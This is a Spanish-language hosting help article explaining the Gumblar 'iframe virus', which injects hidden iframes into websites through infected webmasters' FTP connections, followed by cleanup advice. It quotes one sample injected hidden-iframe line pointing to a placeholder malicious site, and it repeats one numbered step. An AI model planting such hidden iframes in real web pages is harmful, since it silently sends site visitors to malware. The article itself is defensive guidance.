Es importante realizar un escaneo semanal a nuestro hosting utilizando la herramienta ClamAV en nuestro cPanel, así aseguramos la integridad del servidor.
Virus Iframe el virus que se propaga.
¿Virus Iframe? ¿Conocías este virus?, seguramente si eres internauta promedio utilizando un hosting -como casi todos- nunca habías oído hablar de este virus, pero no te preocupes, te vamos a explicar de qué se trata; En si es un troyano/virus que se instala en nuestro computador y cada vez que nosotros nos conectamos al FTP de nuestra página automáticamente inserta un código en todas nuestras páginas, si, así como lees! como si no fuera suficiente con los virus que podemos llegar a tener en nuestra PC ahora también debemos cuidar nuestras páginas webs.
Los virus iframes se caracterizan por incluir código en las páginas web, este código es en la forma de una iframe invisible que re-direcciona al usuario a una web maligna en donde le infecta, a diferencia de otros tipos de malware, este virus requiere de webmasters para propagarse, básicamente lo que hace el virus es esperar por conexiones FTP al servidor, una vez que el webmaster o dueño de un sitio web ha accedido a su sitio vía FTP el virus pasa al sitio web en donde modifica algunas páginas html e inserta un código similar a:
<iframe src=”http://sitio_malicionso.xxx” width=109 height=147 style=”visibility: hidden”/>
No importa cuántas veces borremos el código de la web, el virus volverá aparecer, la razón es sencilla:
El PC del webmaster o persona con acceso FTP está infectado y cada vez que se conecta FTP el virus pasa a las páginas web.
A menudo los usuarios de hosting piensan que el servidor donde está su página tiene el virus, pero no es así, el virus está en el propio PC de los usuarios y esto está comprobado por todas los fabricantes de antivirus y en internet podrás observar a través de los buscadores que este es un virus netamente de usuario no de servidor.
Consejos para eliminar este virus:
1- Limpiar el PC infectado (casi 90% de los usuarios dice por costumbre: NO…PERO TENGO ANTIVIRUS…IMPOSIBLE QUE MI PC ESTE INFECTADO…El afirmar esto es un error muy grave…ya que los antivirus en su mayoría no son capaces de detectar este virus , ya que es solo un código y no algo ejecutable, por lo tanto deja de pensar que tu PC es blindado, NO existe PC blindado!
1- Limpiar el PC infectado (casi 90% de los usuarios dice por costumbre: NO…PERO TENGO ANTIVIRUS…IMPOSIBLE QUE MI PC ESTE INFECTADO…El afirmar esto es un error muy grave…ya que los antivirus en su mayoría no son capaces de detectar este virus , ya que es solo un código y no algo ejecutable, por lo tanto deja de pensar que tu PC es blindado, NO existe PC blindado!
2- Asegúrate de que dispones de un buen antivirus y el mismo se encuentra actualizado y además tengas instalado en tu PC anti-malwares. ( SOLO ANTIVIRUS NO FUNCIONA)
3- Usar la herramienta hijackthis para detectar la presencia del virus local.
4- Ingresa a tu cPanel, cambia las contraseñas.
5- Elimina el código malicioso en las páginas web
ATENCION:
Este código malicioso también se inyecta en los CMS que no están actualizados o son descargados de fuentes no oficiales!
Joomla es fuente de infecciones graves… POR LO TANTO MANTEN TU CMS SIEMPRE ACTUALIZADO y asegurate siempre de cambiar las contraseñas de administrador de JOOMLA.
Nombre del virus : GUMBLAR
Fuentes: http://en.wikipedia.org/wiki/Gumblar
